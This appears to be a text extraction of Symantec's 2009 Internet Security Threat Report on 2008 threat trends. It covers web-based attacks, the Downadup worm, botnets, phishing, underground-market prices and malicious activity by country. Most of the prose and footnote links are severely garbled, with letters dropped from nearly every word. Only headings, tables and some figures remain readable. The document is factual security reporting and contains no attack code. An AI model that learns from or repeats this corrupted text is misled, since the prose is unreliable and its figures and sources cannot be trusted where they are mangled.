B-whitepaper Internet Security Threat Report Xiv 04-2009.en-us

8/14/2019 B-whitepaper Internet Security Threat Report Xiv 04-2009.en-us

1/110

Sym

Ante

CenterpriSe

SeCUrity

Symantec Global Internet

Security Threat Report

tds fo 2008

Volu XiV, publshd Al 2009


2/110

Marc Fossiexcuv edomaag, DvloScu tcholog ad rsos

Eric JohnsonedoScu tcholog ad rsos

Trevor MackAssoca edoScu tcholog ad rsos

Dean Turner

Dco, Global illgc nwokScu tcholog ad rsos

Joseph Blackbirdtha AalsSac Scu rsos

Mo King Lowtha AalsScu tcholog ad rsos

Teo Adamstha AalsScu tcholog ad rsos

David McKinneytha AalsScu tcholog ad rsos

Stephen Entwisletha AalsScu tcholog ad rsos

Marika Pauls Lauchttha AalsScu tcholog ad rsos

Candid Wueesttha AalsScu tcholog ad rsos

Paul WoodSo AalsmssagLabs illgc, Sac

Dan Bleakentha AalsmssagLabs illgc, Sac

Greg Ahmadtha AalsScu tcholog ad rsos

Darren Kemptha AalsScu tcholog ad rsos

Ashif Samnanitha AalsScu tcholog ad rsos


3/110

Introduction. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4

Executive Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5

Highlights . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

Threat Activity Trends . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17

Vulnerability Trends . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35

Malicious Code Trends . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55

Phishing, Underground Economy Servers, and Spam Trends . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73

Appendix ASymantec Best Practices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93

Appendix BThreat Activity Trends Methodology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95

Appendix CVulnerability Trends Methodology. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97

Appendix DMalicious Code Trends Methodology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104

Appendix EPhishing, Underground Economy Servers, and Spam Trends Methodology . . . . . . . . . . 105

Contents

Volu XiV, publshd Al 2009

Symantec Global Internet Security

Threat Report


4/110

Sac Global i Scu tha ro

4

Introduction

th Sac Global Internet Security Threat Report ovds a aual ovvw ad aalss of

woldwd i ha acv, a vw of kow vulabls, ad hghlghs of alcous cod.

tds hshg ad sa a also assssd, as a obsvd acvs o udgoud coo

svs. pvousl sd v sx ohs, hs volu of h Sac Global Internet Security

Threat Report wll al ads o ds ad dg has ha Sac has obsvd fo 2008.

Sac has sablshd so of h os cohsv soucs of i ha daa h wold

hough h Sac Global illgc nwok. mo ha 240,000 ssos ov 200 cous

oo aack acv hough a cobao of Sac oducs ad svcs such as Sac

DSgh tha maag Ss, Sac maagd Scu Svcs ad noo cosu

oducs, as wll as addoal hd-a daa soucs.

Sac also gahs alcous cod llgc fo o ha 130 llo cl, sv, ad gawa

sss ha hav dlod s avus oducs. Addoall, Sacs dsbud hoo wok

collcs daa fo aoud h glob, caug vousl us has ad aacks ad ovdgvaluabl sgh o aack hods.

Sac aas o of h wolds os cohsv vulabl daabass, cul cossg

of o ha 32,000 codd vulabls (sag o ha wo dcads) affcg o ha

72,000 chologs fo o ha 11,000 vdos. Sac also faclas h Bugtaq alg ls,

o of h os oula fous fo h dsclosu ad dscusso of vulabls o h i, whch

has aoxal 50,000 subscbs who cobu, cv, ad dscuss vulabl sach o a

dal bass.

Sa ad hshg daa s caud hough a va of soucs cludg: h Sac pob nwok,

a ss of o ha 2.5 llo dco accous; mssagLabs illgc, a scd souc of daa

ad aalss fo ssagg scu ssus, ds ad sascs; ad oh Sac chologs. Daas collcd o ha 86 cous fo aoud h glob. Ov gh bllo al ssags, as wll

as ov o bllo Wb quss a ocssd da acoss 16 daa cs. Sac also gahs

hshg foao hough a xsv afaud cou of ss, scu vdos ad

o ha 50 llo cosus.

ths soucs gv Sacs aalss uaallld soucs of daa wh whch o df, aalz, ad

ovd fod coa o gg ds aacks, alcous cod acv, hshg, ad sa.

th sul s h Sac Global Internet Security Threat Report, whch gvs ss ad cosus

h ssal foao o ffcvl scu h sss ow ad o h fuu.


5/110


5

Executive Summary

th Sac Internet Security Threat Report cosss al of fou os: h Global Internet Security

Threat Report; h EMEA Internet Security Threat Report, fo h euo, h mddl eas, ad Afca

(emeA) go; hAPJ Internet Security Threat Report, fo h Asa-pacfc/Jaa (ApJ) go; ad h

Government Internet Security Threat Report, whch focuss o has of scfc s o govs

ad ccal fasucu scos. togh, hs os ovd a dald ovvw ad aalss of

i ha acv, alcous cod, ad kow vulabls. tds hshg ad sa a also

assssd, as a obsvd acvs o udgoud coo svs.

ths sua wll dscuss cu ds, dg has, ad h coug voluo of h i

ha ladsca basd o daa fo 2008 dscussd wh h fou os. ths sua wll also dscuss

how goal dffcs ca affc alcous acv globall.

th a a ub of ds od vous volus of h Sac Internet Security Threat Report

ha coud 2008: alcous acv has casgl bco Wb-basd; aacks a agg d

uss sad of cous; h ol udgoud coo has cosoldad ad aud; ad aacksa abl o adl ada h aack acvs.1

Sac cl xad hs ds alog wh h coud cosoldao of alcous acvs

h ol udgoud coo h Sac Report on the Underground Economy.2 tha o foud

ha h udgoud coo s gogahcall dvs ad abl o ga llos of dollas vu

fo (of) wll-ogazd gous. th udgoud coo s also casgl bcog a slf-

susag ss wh ools scfcall dvlod o facla faud ad hf a fl bough ad

sold. ths ools a h usd fo foao hf ha a h b covd o of o fud h

dvlo of addoal ools.

Basd o h daa ad dscussos sd h cu Sac Internet Security Threat Report, hs

sua wll xa h a hods bg usd o coos d uss ad ogazaos, who sgag hs aacks, ad wha hs aacks a af. Fall, hs sua wll look a gg

ds ha Sac blvs wll bco val h da fuu.

How users are being compromised

Wb-basd aacks a ow h a vco fo alcous acv ov h i. th coud

gowh of h i ad h ub of ol casgl usg fo a xsv aa of acvs

ss aacks wh a gowg ag of ags as wll as vaous as o lauch alcous acv.3

Wh hs acv, Sac has od ha os Wb-basd aacks a lauchd agas uss who vs

lga wbss ha hav b coosd b aacks od o sv alcous co.

So of h coo chqus usd b aacks o coos a wbs clud xlog a

vulabl Wb alcao ug o h sv (b aackg hough ol scud u flds),

o xlog so vulabl s h udlg hos oag ss. i 2008 alo, h w

12,885 s-scfc vulabls dfd (fgu 1) ad 63 c of vulabls docud b

Sac affcd Wb alcaos. Aacks ca xlo hs vulabls a wbs o udlg

alcao o odf h ags svd o uss vsg h s. ths ca clud dcl svg alcous

1 h://val.sac.co/kgfo/s/wh_as/b-wha_xc_sua__scu_ha_o_x_04-2008.-us.df2 h://val.sac.co/kgfo/s/wh_as/b-wha_udgoud_coo_o_11-2008-14525717.-us.df3 h://www.vsg.co/sac/043939.df


6/110


6

co fo h s slf, o bddg a alcous fa o ags ha ca dc a uss bows o

aoh Wb sv ha s ud h aacks cool.4 i hs wa, h coos of a sgl wbs

ca caus aacks o b lauchd agas v vso o ha s.

Period

2007 2008

12,885

17,697

Figure 1. Site-specific vulnerabilities

Source: Based on data provided by the XSSed Project5

i h cas of a oula, usd s wh a lag ub of vsos, hs ca ld housads of

cooss fo a sgl aack. Fo xal, o aack ha agd h wbss of boh h Ud

naos ad h UK gov, aog ohs, jcd alcous cod ha was dsgd o load co

fo a aack-coolld locao o vsos bowss.6 Aoh saa aack succssfull dfacdh aoal Albaa osal svc wbs.7 ths s of aacks ovd a oal bachhad fo

dsbug alcous cod bcaus h ag hgh-affc wbss of uabl ogazaos.

i od o coos h lags ossbl ub of wbss wh a sgl chas, aacks wll

a o coos a class of vulabl b sachg fo cooals wh h ad

gcall auoag h dscov ad xloao. ths allows aacks o coos wbss

wh h ffcc cool foud wok wos.

th lgh ad colcad ss bg usud o lauch succssful Wb-basd aacks also dosa

h casg colx of h hods usd b aacks. Whl a sgl hgh-sv flaw ca b

xlod o full coos a us, aacks a ow fqul sgg ogh ull xlos fo

du-sv vulabls o achv h sa goal. A dcao of hs s ha gh of h o 10vulabls xlod 2008 w ad as du sv.

4 A fa s a HtmL l ha ca clud Wb co fo oh ags o Wb svs o b dd wh h us vss h ogal ag. ths ag ca bcosucd so ha s ffcvl vsbl ad h us wll o s a of h bddd co wh vwg h ogal ag.

5 Daa was ovdd b h XSSd pojc, a s dvod o ackg ad vfg os of s-scfc coss-s scg vulabls: h://www.xssd.co.6 h://ws.c.co/8301-10789_3-9925637-57.hl7 h://albass.co/?=3


7/110


7

ma ss ad d uss wll of ak achg hgh-sv vulabls a o o,

whl du- ad low-sv vulabls a b god. ths could sul h ossbl of o

cous ag xosd fo log ods o hs vulabls. Fo xal, of h 12,885 s-

scfc coss-s scg vulabls dfd b Sac 2008, ol 394 (3 c) a kow

b Sac o hav b fxd.8

ths dvlos ad ds dca ha Wb-basd has hav o ol bco wdsad, bu

ha h hav also casd sohscao. i acula, Sac has ocd ha so bos

(such as Asox,9 whch was all usd fo hshg scas) a bg dsgd o scfcall xlo

coss-s scg vulabls od o jc alcous cod o coosd wbss.10

i a cass, du-sv vulabls a suffc o ou succssful aacks f aacks

a abl o xcu aba cod ad fo acos such as accssg cofdal foao o

akg wok cocos. ths s ad ossbl bcaus a d uss do o qu adsav

vlgs o u o odf h agd alcaos. Whl h dag of cl-sd vulabls a

b ld b bs accs, such as scg Wb alcaos a h adsav lvl, hs s of

ualsc gv how gal Wb alcaos a o h dlv of co fo a bussss. mdu-sv vulabls affcg cl o dsko alcaos a of suffc fo a aack o ou

succssful alcous aacks o dvdual d uss as wll as a h s lvl.

tha sad, howv, a sgl hgh-sv vulabl was h o aackd flaw 2008. pvous dos

of h Sac Internet Security Threat Report od ha h has b a dcas h volu of

wok wos, al du o a lack of asl xloabl o vulabls dfaul oag ss

coos. ma wok wos xlod such vulabls od o oaga. Hghl succssful

wossuch as Codrd,11 nda,12 ad Sla13all xlod hgh-sv vulabls ol

accssbl svcs o sad. ths wos od chags scu asus, such as h cluso

of soal fwall alcaos oag sss ha a ud o b dfaul. ths hld oc

uss fo os wok wos, v f h vulabl bg xlod was o dal achd.

th hgh-sv vulabl quso was a zo-da vulabl ha was dscovd la 2008

h mcosof Wdows Sv Svc rpC Hadlg coo ha allowd o cod xcuo.14

Bcaus o coucao wh hs svc s allowd hough h Wdows fwall wh fl ad

shag s ud o, a uss would hav o al h ach o b ocd fo xloao

as. Soo af, a w wo calld Dowadu (also kow as Cofck) gd ha xlod

hs vulabl.15 Dowadu was abl o sad adl, aall du o s advacd oagao

chass ad s abl o sad hough ovabl da dvcs.16 B h d of 2008 h w

wll ov a llo dvdual cous fcd b Dowadu. Oc Dowadu has fcd a cou,

uss a Wb o -o- (p2p) uda chas o dowload udad vsos of slf, o o sall

oh alcous cod oo h coosd cou.

8 Fo h uos of hs o, h coss-s scg casulas wo boad classs of vulabl; hs cluds adoal coss-s scg ad a cagokow as HtmL jco (o ss coss-s scg).

9 h://www.sac.co/scu_sos/wu.js?docd=2007-060812-4603-9910 h://www.ssaglabs.co/lo/mLiro_Aual_2008_FinAL.df : . 3311 h://www.sac.co/scu_sos/wu.js?docd=2001-071911-5755-9912 h://www.sac.co/scu_sos/wu.js?docd=2001-091816-3508-9913 h://www.sac.co/scu_sos/wu.js?docd=2003-012502-3306-9914 h://www.scufocus.co/bd/3187415 h://www.sac.co/scu_sos/wu.js?docd=2008-112203-2408-9916 hs://fous2.sac.co/5/malcous-Cod/Dowadu-As-a-Sa-nwok-Scag/ba-/382114 - A233


8/110


8

Dowadu has b aculal olfc h ApJ ad La Aca (LAm) gos.17 ths gos a

also wh so of h hghs sofwa ac as a codd.18 Bcaus ad vsos of sofwa

a fqul uabl o us auoad uda chass fo scu achs ( cas h a dcd

ad dsabld), s lkl a cous hs wo gos hav o b achd agas Dowadu.

Sofwa ac as a of hgh a gg aks wh adl gowg i adboadbad fasucus.19

Fo h daa gahd fo hs og od, Sac has also od oh sgfca alcous

acvs occug cous wh adl gg i fasucus. Fo xal, whl h

Ud Sas s sll ho o a lag aou of ha acv ad cous o b h o akd cou

fo alcous acval du o s xsv boadbad ao ad sgfcal dvlod

i fasucuSac has od a sad cas alcous acv cous o

vousl assocad wh such acvs. O sul of hs d s ha hs cous ca aal o

aacks as oal bass fo hosg hshg wbss, sa las, ad oh alcous co,

ossbl bcaus adl gowg iSps hs aas a hav dffcul oog ad flg h

gowg volu of affc acoss h woks.

Aacks a also ogazd ough o l cogc las cas h acvs a dcd.

B locag h acvs o a va of cous, aacks ca z h chacs of bg aall

o coll shu dow. ths s dosad b vs af h shudow of a U.S.-basd iSp owad

h d of 2008.20 i ss ha h bo coolls gag uch of h aack acv fo hs iSp

had alav hosg las.21 As a sul, alhough Sac od a sgfca do alcous

acv af h shudow, aculal sa, h ubs ud o vous lvls soo afwad.

i bca aa ha h bo coolls had b abl o succssfull loca ough of h bo

coad-ad-cool (C&C) svs o oh hoss, ad w hus abl o buld h bos back u o

vous ubs. Gv ha h affcd bos w h of h wolds lags, s o susg ha

w locaos w quckl foud o hos hs svs du o h sgfca ofs such bos a abl

o ga.

What attackers want

mo ha v bfo, aacks a cocag o coosg d uss fo facal ga. i 2008,

78 c of cofdal foao has xod us daa, ad 76 c usd a ksok-loggg

coo o sal foao such as ol bakg accou cdals. Addoall, 76 c of

hshg lus agd bads h facal svcs sco (fgu 2) ad hs sco also had h os

ds xosd du o daa bachs. Slal, 12 c of all daa bachs ha occud 2008

xosd cd cad foao. i 2008 h avag cos cd of a daa bach h Ud

Sas was $6.7 llo22whch s a cas of 5 c fo 2007ad los busss aoud o

a avag of $4.6 llo.23

17 hs://fous2.sac.co/5/malcous-Cod/Dowadu-Go-locao-Fgg-ad-pac/ba-/380993 - A22818 h://aschca.co/old/co/2008/01/bsa-ac-cooc-ac-s-s-of-bllos-of-dollas.as19 h://fdacls.co//acls/_0ein/s_2008_ma_14/a_2541179520 h://val.sac.co/kgfo/s/oh_soucs/b-sa_of_sa_o_12-2008.-us.df : . 721 h://www.hgs.co.uk/2008/11/18/sho_ccolo_suco/22 All fgus a U.S. dollas ulss ohws od.23 h://www.coos.co/dowload/poo_COB_2008_US_090201.df


9/110


9

4%

1%


10/110


10

2008

Rank

1

2

3

4

5

6

7

8

9

10

2007

Rank

1

2

9

3

12

4

6

5

17

8

Item

Credit card information

Bank account credentials

Email accounts

Email addresses

Proxies

Full identities

Mailers

Cash out services

Shell scripts

Scams

2008

Percentage

32%

19%

5%

5%

4%

4%

3%

3%

3%

3%

2007

Percentage

21%

17%

4%

6%

3%

6%

5%

5%

2%

5%

Range of Prices

$0.06$30

$10$1000

$0.10$100

$0.33/MB$100/MB

$0.16$20

$0.70$60

$2$40

8%50% or flat rate of$200$2000 per item

$2$20

$3$40/week for hosting,$2$20 design

Table 1. Goods and services available for sale on underground economy servers

Source: Symantec

O sul ha Sac has daw fo h obsvac of casd ofssoalzao h

udgoud coo s ha h coodao of scalzd ad, so cass, cov gous fo

h oduco ad dsbuo of s such as cusozd alcous cod ad hshg ks has ld o a

daac cas h gal olfao of alcous cod. i 2008, Sac dcd 1,656,227

alcous cod has (fgu 3). ths ss ov 60 c of h aoxal 2.6 llo

alcous cod has ha Sac has dcd oal ov .

Numberofnew

threats

0

200,000

1,000,000

800,000

1,800,000

1,600,000

Period

600,000

400,000

1,400,000

1,200,000

2002

20,547

2003

18,827

2004

69,107

2005

113,025

2006

140,690

2007

624,267

2008

1,656,227

Figure 3. New malicious code threats

Source: Symantec


11/110


11

A xal of hs of udgoud ofssoal ogazao s h russa Busss nwok

(rBn). th rBn udl scalzs h dsbuo of alcous cod, hosg alcous wbss,

ad oh alcous acv. th rBn has b cdd wh cag aoxal half of h hshg

cds ha occud woldwd las a. i s also hough o b assocad wh a sgfca aou

of h alcous acvs o h i 2007.

Sc ha h hav b wo sgfca cass of iSps ha w shu dow bcaus of alcous

acv. ths iSps w hosg alcous cod, hshg wbss, bo C&C svs, ad sa las.

ths cluds h sac od abov, wh Sac saw a 65 c do sa ad a 30 c

dcas bo acv wh 24 hous of o acula iSp bg ak offl.25 Whl a s

akabl ha h shudow of a sgl iSp ca sul such dasc dcass alcous acv

wh a sho od, as od, alcous acv s casgl ogazd ad aacks a ow

adl ad fo cogcs ha gh affc h oaos. much of h alcous acv was

sl shfd o oh locaos. i hs sac, h iSp v sufacd bfl o affod h gou a

oou o uda h bos ud h cool.26

i hs casgl sohscad i ha ladsca, h s a gowg us fo gacooao o addss h hgh dg of ogazao of gous cag has o h i. ths

was dosad b h aggssv sad of h Dowadu wo h la ohs of 2008 ad o

2009. Du o s ull oagao chass, h wo was abl o sad adl. mo woso

s h fac ha h wo coas a uda chas ha could allow w vsos of h wo o

oh has, such as a bo, o b salld o coosd cous. to coba s ad sad ad

aggssv ofl, a coalo was fod b sakholds volvd i scu.27 th succss of

hs coalo of dfg how h wo oas, slowg s gowh, ad lg s oal dag

dosas h bfs of casd cooao aog i scu sakholds.

Conclusion

Chags h cu ha ladscasuch as h casg colx ad sohscao of

aacks, h voluo of aacks ad aack as, ad alcous acvs bg ushd o gg

cousshow o jus h bfs of, bu also h d fo casd cooao aog scu

coas, govs, acadcs, ad oh ogazaos ad dvduals o coba hs chags.

Sac xcs alcous acv o cou o b ushd o gos wh gg fasucus

ha a sll lack h soucs o coba h gowg volv of ogazd c h ol

udgoud coo. th ous wll b o ogazaos, suos, ad oh kowldgabl gous

o co ogh fo h bf of h affcd gos. i ha acv s ul global, ad

alcous acv allowd o floush o aa could quckl sad woldwd.

Wh h casg adaabl of alcous cod dvlos ad h abl o vad dco,

Sac also xcs ha ov aack acvs wll h b abadod o ushd fuh udgoud.

Fo xal, f h ffo o s u alcous iSps ouwghs h u fo aacks bfo bg ak

offl, s lkl ha aacks wll abado hs aoach fo oh aack vcos od o cou o

vad dco ad oal ahso o oscuo. ths has alad b s wh h us of

25 Cf. h://val.sac.co/kgfo/s/oh_soucs/b-sa_of_sa_o_12-2008.-us.df : . 7ad h://www.ssaglabs.co/lo/mLiro_Aual_2008_FinAL.df : . 26

26 h://www.cwold.co/busssc/acl/154554/sas_gag_cool_ov_szb_bo.hl27 hs://fous2.sac.co/5/malcous-Cod/Coalo-Fod--rsos-o-W32-Dowadu/ba-/388129 - A241


12/110


12

Http ad p2p coucao chals has such as Dowadu. Bcaus of h dsbud au of

hs cool chals, s uch o dffcul o dsabl a wok ad loca h dvdual o

gou bhd h aacks.

th lag cas h ub of w alcous cod has, could wh h us of h Wb as a

dsbuo chas, also dosas h gowg d fo o sosv ad cooav scu

asus. Whl avus sgau scag, husc dco, ad uso vo cou o b

val fo h scu of ogazaos as wll as d uss, w chologs, such as uao-basd

scu, wll bco casgl oa.

th focus of has 2008 coud o b ad a xlog d uss fo of, ad aacks

hav coud o volv ad f h abls fo ol faud. Whl so cal gous hav co

ad go, oh lag ogazaos ss ad cou o cosolda h acvs. ths sudo-

cooaos ad h u-ad-cog coos wll lkl a a h fofo of alcous acv

h cog a.


13/110


13

Highlights

ths sco ovds hghlghs of h scu ds ha Sac obsvd 2008 basd o h daa

gahd fo h soucs lsd h oduco o hs o. Slcd cs wll b dscussd

ga dh h scos ha follow.

Threat Activity Trends Highlights

Dug hs og od, 23 c of all alcous acv asud b Sac 2008 was

locad h Ud Sas; hs s a dcas fo 26 c 2007.

th Ud Sas was h o cou of aack og 2008, accoug fo 25 c of woldwd

acv; hs s a dcas fo 29 c 2007.

th ducao sco accoud fo 27 c of daa bachs ha could lad o d hf dug

hs od, o ha a oh sco ad a slgh cas fo 26 c 2007.

th facal sco was h o sco fo ds xosd 2008, accoug fo 29 c of h

oal ad a cas fo 10 c 2007.

i 2008, h hf o loss of a cou o oh daa-soag dvcs accoud fo 48 c of daa

bachs ha could lad o d hf ad fo 66 c of h ds xosd.

Sac obsvd a avag of 75,158 acv bo-fcd cous da 2008, a cas of

31 c fo h vous od.

Cha had h os bo-fcd cous 2008, accoug fo 13 c of h woldwd oal;

hs s a dcas fo 19 c 2007.

Buos As was h c wh h os bo-fcd cous 2008, accoug fo 4 c of h

woldwd oal.

i 2008, Sac dfd 15,197 dsc w bo coad-ad-cool svs; of hs,

43 c oad hough irC chals ad 57 c usd Http.

th Ud Sas was h locao fo h os bo coad-ad-cool svs 2008, wh

33 c of h oal, o ha a oh cou.

th o Wb-basd aack 2008 was assocad wh h mcosof i exlo ADODB.Sa

Objc Fl isallao Wakss vulabl, whch accoud fo 30 c of h oal.

th Ud Sas was h o cou of og fo Wb-basd aacks 2008, accoug fo

38 c of h woldwd oal.

th Ud Sas was h cou os fqul agd b dal-of-svc aacks 2008,

accoug fo 51 c of h woldwd oal.


14/110


14

Vulnerability Trends Highlights

Sac docud 5,491 vulabls 2008; hs s a 19 c cas ov h

4,625 vulabls docud 2007.

two c of vulabls 2008 w classfd as hgh sv, 67 c as du sv,

ad 30 c as low sv.28 i 2007, 4 c of vulabls w classfd as hgh sv,

61 c as du sv, ad 35 c as low sv.

egh c of docud vulabls w classfd as asl xloabl 2008; hs s a

cas fo 2007, wh 74 c of docud vulabls w classfd as asl xloabl.

Of a bows aalzd 2008, Al Safa had h logs wdow of xosu (h bw

h las of xlo cod fo a vulabl ad a vdo lasg a ach), wh a -da avag;

mozlla bowss had h shos wdow of xosu 2008, avagg lss ha o da.

mozlla bowss w affcd b 99 w vulabls 2008, o ha a oh bows; h

w 47 w vulabls dfd i exlo, 40 Al Safa, 35 Oa, ad 11

Googl Cho.29

th w 415 bows lug- vulabls dfd 2008, fw ha h 475 dfd 2007.

AcvX chologs sll cosud h ajo of w bows lug- vulabls, wh a oal of

287; howv, hs s subsaall dow fo h 399 AcvX vulabls dfd 2007.

mo couo vulabls aga ad u h ajo of h of vulabls bows

lug- chologs fo 2008, wh 271 vulabls classfd as such.

i 2008, 63 c of vulabls affcd Wb alcaos, a cas fo 59 c 2007.

Dug 2008, h w 12,885 s-scfc coss-s scg vulabls dfd, coad o

17,697 2007; of h vulabls dfd 2008, ol 3 c (394 vulabls) had b

fxd a h of wg.

i 2008, Sac docud zo-da vulabls, coad o 15 2007.

th o aackd vulabl fo 2008 was h mcosof Wdows Sv Svc rpC Hadlg

ro Cod excuo Vulabl.

i 2008, 95 c of aackd vulabls w cl-sd vulabls ad 5 c w

sv-sd vulabls, coad o 93 c ad 7 c, scvl, 2007.

28 pcags a oudd off o h closs whol ub ad cags a o qual 100 c so sacs.29 Googl Cho was lasd Sb 2008.


15/110


15

Malicious Code Trends Highlights

i 2008, h ub of w alcous cod sgaus casd b 265 c ov 2007; ov

60 c of all cul dcd alcous cod has w dcd 2008.

Of h o 10 w alcous cod fals dcd 2008, h w tojas, h w tojas

wh a back doo coo, wo w wos, o was a wo wh a back doo coo, ad

o was a wo wh back doo ad vus coos.

tojas ad u 68 c of h volu of h o 50 alcous cod sals od 2008, a

o dcas fo 69 c 2007.

Fv of h o 10 sagd dowloads 2008 w tojas, wo w tojas ha cooad a back

doo coo, o was a wo, o of was a wo ha cooad a back doo, ad o was a

wo ha cooad a vus coo.

i 2008, h oooal cas of oal alcous cod fcos was gas h euo,

h mddl eas ad Afca go.

th cag of has o cofdal foao ha cooa o accss caabls

dcld o 83 c 2008; hs s a dcas fo 91 c 2007, alhough such has

ad h os val xosu .

i 2008, 78 c of has o cofdal foao xod us daa ad 76 c had

a ksok-loggg coo; hs a cass fo 74 c ad 72 c, scvl,

2007.

poagao hough xcuabl fl shag coud o cas 2008, accoug fo 66 c

of alcous cod ha oagasu fo 44 c 2007.

O c of h volu of h o 50 alcous cod sals odfd Wb ags 2008, dow

fo 2 c 2007.

th cag of docud alcous cod sals ha xlo vulabls dcld subsaall,

fo 13 c 2007 o 3 c 2008.

i 2008, gh of h o 10 dowloadd coos w tojas, o was a toja wh a back doo

coo, ad o was a back doo.

malcous cod ha ags ol gas accoud fo 10 c of h volu of h o 50 oal

alcous cod fcos, u fo 7 c 2007.


16/110


16

Phishing, Underground Economy Servers, and Spam Trends Highlights

th ajo of bads usd hshg aacks 2008 w h facal svcs sco, accoug

fo 79 c, dow slghl fo 83 c dfd 2007.

th facal svcs sco accoud fo h hghs volu of hshg lus dug hs od, wh

76 c of h oal; hs s cosdabl hgh ha 2007, wh h volu fo facal svcs was

52 c.

i 2008, Sac dcd 55,389 hshg wbs hoss, a cas of 66 c ov 2007, wh

Sac dcd 33,428 hshg hoss.

i 2008, 43 c of all hshg wbss dfd b Sac w locad h Ud Sas,

cosdabl lss ha 2007, wh 69 c of such ss w basd h.

th os coo o-lvl doa usd hshg lus dcd 2008 was .co, accoug fo

39 c of h oal; was also h hghs akg o-lvl doa 2007, wh accoud fo

46 c of h oal.

O acula auoad hshg oolk dfd b Sac was sosbl fo a avag of

14 c of all hshg aacks dug 2008.

Cd cad foao was h os cool advsd fo sal o udgoud coo

svs kow o Sac, accoug fo 32 c of all goods ad svcs; hs s a cas

fo 2007 wh cd cad foao accoud fo 21 c of h oal.

th Ud Sas was h o cou fo cd cads advsd o udgoud coo svs,

accoug fo 67 c of h oal; hs s a dcas fo 2007 wh accoud fo 83 c

of h oal.

th os coo of sa dcd 2008 was lad o i- o cou-lad goods ad

svcs, whch ad u 24 c of all dcd sa; 2007, hs was h scod os coo

of sa, accoug fo 19 c of h oal.

Sac obsvd a 192 c cas sa dcd acoss h i, fo 119.6 bllo

ssags 2007 o 349.6 bllo 2008.

i 2008, 25 c of all sa codd b Sac ogad h Ud Sas, a subsaal

dcas fo 45 c 2007, wh h Ud Sas was also h o akd cou of og.

i 2008, bo woks w sosbl fo h dsbuo of aoxal 90 c of all

sa al.


17/110


17

Threat Activity Trends

ths sco of h Sac Global Internet Security Threat Report wll ovd a aalss of ha

acv, as wll as oh alcous acv, daa bachs, ad Wb-basd aacks ha Sac obsvd

2008. th alcous acv dscussd hs sco o ol cluds ha acv, bu also hshg,

alcous cod, sa zobs, bo-fcd cous, ad bo C&C sv acv. Aacks a dfd as

a alcous acv cad ou ov a wok ha has b dcd b a uso dco ss

(iDS) o fwall. Dfos fo h oh s of alcous acvs ca b foud h scv

scos wh hs o.

ths sco wll dscuss h followg cs, ovdg aalss ad dscusso of h ds dcad b

h daa:

malcous acv b cou

Daa bachs ha could lad o d hf b sco

Daa bachs ha could lad o d hf b caus

Bo-fcd cous

Bo coad-ad-cool svs

to Wb-basd aacks

to cous of og fo Wb-basd aacks

tha acvoco ad gao

Malicious activity by country

ths c wll assss h cous whch h lags aou of alcous acv aks lac o

ogas. to d hs, Sac has cold gogahcal daa o uous alcous acvs,

cludg: bo-fcd cous, hshg wbs hoss, alcous cod os, sa zobs, ad

aack og. th akgs a dd b calculag h a avag of h ooo of hs

alcous acvs ha ogad ach cou.

malcous acv usuall affcs cous ha a cocd o hgh-sd boadbad i bcaus

hs cocos a aacv ags fo aacks. Boadbad cocos ovd lag badwdh

caacs ha oh coco s, fas sds, h oal of cosal cocd sss, ad

call o sabl cocos. th o h cous hs ch Ud Sas, Cha, ad

Gaall hav xsvl dvlod ad gowg boadbad fasucus.30 Cha, whch assd

h Ud Sas fo h lags ub of boadbad subscbs fo h fs 2008, has 21 c

of h woldwd boadbad subscb oal wh 83.3 llo subscbs. th Ud Sas s scod

wh 20 c, whl Ga s fouh wh 6 c. each cou also xcd a gowh of

ov 20 c boadbad subscbs fo 2007.

i 2008, h Ud Sas was h o cou fo ovall alcous acv, akg u 23 c of h

oal (abl 2). ths s a dcas fo 2007 wh h Ud Sas was also fs, wh 26 c. Wh

scfc cago asus, h Ud Sas akd fs alcous cod, hshg wbs hoss,

ad aack og.

30 h://www.o-oc.co


18/110


18

2008

Rank

1

2

3

4

5

6

7

8

9

10

2007

Rank

1

2

3

4

8

6

7

5

15

12

Country

United States

China

Germany

United Kingdom

Brazil

Spain

Italy

France

Turkey

Poland

2008

Overall

Percentage

23%

9%

6%

5%

4%

4%

3%

3%

3%

3%

2007

Overall

Percentage

26%

11%

7%

4%

3%

3%

3%

4%

2%

2%

Malicious

Code

Rank

1

2

12

4

16

10

11

8

15

23

Spam

Zombies

Rank

3

4

2

10

1

8

6

14

5

9

Phishing

Websites

Host Rank

1

6

2

5

16

13

14

9

24

8

Bot

Rank

2

1

4

9

5

3

6

10

8

7

Attack

Origin

Rank

1

2

4

3

9

6

8

5

12

17

Table 2. Malicious activity by country

Source: Symantec

th slgh dcas ovall alcous acv fo h Ud Sas ca b abud o h do

sa zobs h. ths s l kl du o h shudow of wo U.S.-basd Wb hosg coas ha

w allgdl hosg a lag ub of bo C&C svs assocad wh sa dsbuo bo woks

(bos).31 Sa acv dcasd woldwd af boh shudows. i o cas, Sac obsvd a

65 c dcas sa affc h 24 hous ha followd.32 Boh coas allgdl hosd a

lag ub of bo C&C svs fo sval lag sa bos: Szb,33 rusock,34 ad Ozdok (mga-D).35

Sa zobs ha lack a ccal coad ss a uabl o sd ou sa.

Cha had h scod hghs aou of ovall woldwd alcous acv 2008, accoug fo

9 c; hs s a dcas fo 11 c h vous og od. Alog wh h fac ha

Cha has h os boadbad subscbs h wold, h aou of s ol b uss h

could cobu o h hgh cag of alcous acv Cha. th log a us s ol, h

